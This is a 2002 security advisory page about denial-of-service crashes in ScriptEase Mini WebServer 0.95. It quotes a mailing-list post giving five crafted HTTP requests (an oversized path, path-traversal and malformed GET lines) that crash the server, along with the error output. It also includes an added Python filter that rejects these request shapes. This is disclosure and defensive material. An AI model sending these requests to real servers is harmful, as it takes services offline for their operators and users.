SecurityTracker.com
Category:   Application (Web Server/CGI)  >   ScriptEase Mini WebServer
Vendors:   Nombas, Inc.
(Additional Exploit Methods Are Provided) Re: ScriptEase Mini WebServer Can Be Crashed By Remote Users Sending Long HTTP Requests
SecurityTracker Alert ID:  1003608
SecurityTracker URL:  http://securitytracker.com/id/1003608
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 20 2002
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 0.95, possibly others
Description:   SecurityOffice.net reported a denial of service vulnerability in the ScriptEase Mini WebServer. A remote user can crash the web services.

In the original alert, it was reported that a remote user can submit a long HTTP request to cause the web server to crash:

http://[targethost]/AAAAAA...(Ax2000)...AAAAAA

A user has added that there are other methods to cause the server to crash:

GET /%2e%2e/ HTTP/1.0
GET /../../../../../../../../../ HTTP/1.0
GET HTTP/1.0
GET ../../../../../../../../../../ HTTP/1.0

Impact:   A remote user can crash the web services. A restart is required to return the web services to normal operations.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.nombas.com/us/download/ndownload.htm
Cause:   Exception handling error
Underlying OS:  Windows (Any)
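
With no vendor fix available, a filtering front end or a log triage script can reject the request shapes listed in the description before they reach the server. The following is an added example, not code from this advisory, the reporter or the vendor; the function name, the 1024-byte limit and the origin-form-only policy are assumptions.

```python
# Added example: strict HTTP/1.x request-line check for a filtering proxy or log triage.
# check_request_line and MAX_TARGET_LEN are hypothetical names, not from the advisory.
import re
from urllib.parse import unquote

MAX_TARGET_LEN = 1024  # assumed limit; the original alert describes a ~2000-byte path
# METHOD SP request-target SP HTTP/x.y, with exactly one space between the parts.
REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) HTTP/(\d)\.(\d)$")


def check_request_line(line):
    """Return (status, reason): 200 if acceptable, else the error to answer with."""
    m = REQUEST_LINE.match(line.rstrip("\r\n"))
    if m is None:
        # Covers a missing request target, e.g. "GET HTTP/1.0".
        return 400, "malformed request line"
    target = m.group(2)
    if len(target) > MAX_TARGET_LEN:
        return 414, "request target too long"
    if not target.startswith("/"):
        # Assumed policy: only origin-form targets ("/path") are accepted.
        return 400, "target is not an absolute path"
    # Drop the query, percent-decode once, normalise separators, then check segments.
    path = unquote(target.split("?", 1)[0]).replace("\\", "/")
    if "\x00" in path:
        return 400, "NUL byte in path"
    if ".." in path.split("/"):
        return 400, "dot-dot segment in path"
    return 200, "ok"


# Constructed sample input: the request shapes from the description plus a benign line.
SAMPLES = [
    "GET /index.html HTTP/1.0",
    "GET /%2e%2e/ HTTP/1.0",
    "GET /../../../../../../../../../ HTTP/1.0",
    "GET HTTP/1.0",
    "GET ../../../../../../../../../../ HTTP/1.0",
    "GET /" + "A" * 2000 + " HTTP/1.0",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        status, reason = check_request_line(sample)
        print(status, reason, "|", sample[:60])
```

Requests that fail the check should receive the error response from the filter itself and never be forwarded to the ScriptEase server.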

Message History:   This archive entry is a follow-up to the message listed below.
Feb 19 2002 ScriptEase Mini WebServer Can Be Crashed By Remote Users Sending Long HTTP Requests



 Source Message Contents

Subject:  Four More ScriptEase MiniWeb Server v0.95 DoS Attacks



The following are four more Server Denial of Service Attacks against 
ScriptEase MiniWeb Server 0.95.

These attacks do not make the server point to an invalid memory address 
like the previous post.

I believe the first two attacks I describe are internal server problems 
due to either coding errors or incomplete coding. The second two may 
just be configuration problems on my part, as this assessment was done 
fairly quickly.

After we receive "Press a key..." on the server side, the server stops 
and needs to be manually restarted.

Thanks to Tamer Sahin for his earlier post.
(http://www.securityfocus.com/archive/1/257031)

Cheers,
'ken'@FTU


<--------------- BOF ------------->

Dos One.
We Send:
GET /%2e%2e/ HTTP/1.0

ScriptEase Internal Server Reply:
1512: Cannot compare variable of different dimension.
Press a key...

=======

Dos Two.
We Send:
GET /../../../../../../../../../ HTTP/1.0

ScriptEase Internal Server Reply:
1512: Cannot compare variable of different dimension.
Press a key...

=======

Dos Three.
We Send:
GET HTTP/1.0

ScriptEase Internal Server Reply:
5108: Invalid VA_LIST.
Press a key...

=======

Dos Four.
We Send:
GET ../../../../../../../../../../ HTTP/1.0

ScriptEase Internal Server Reply:
5108: Invalid VA_LIST.
Press a key...


<--------------- EOF ------------->




-- 
"I grew convinced that truth, sincerity and integrity in dealings 
between man and man were of the utmost importance to the felicity of 
life, and I formed a written resolution to practise them ever while I 
lived."
	-Benjamin Franklin, The Autobiography of Benjamin Franklin


 
 



Copyright 2019, SecurityGlobal.net LLC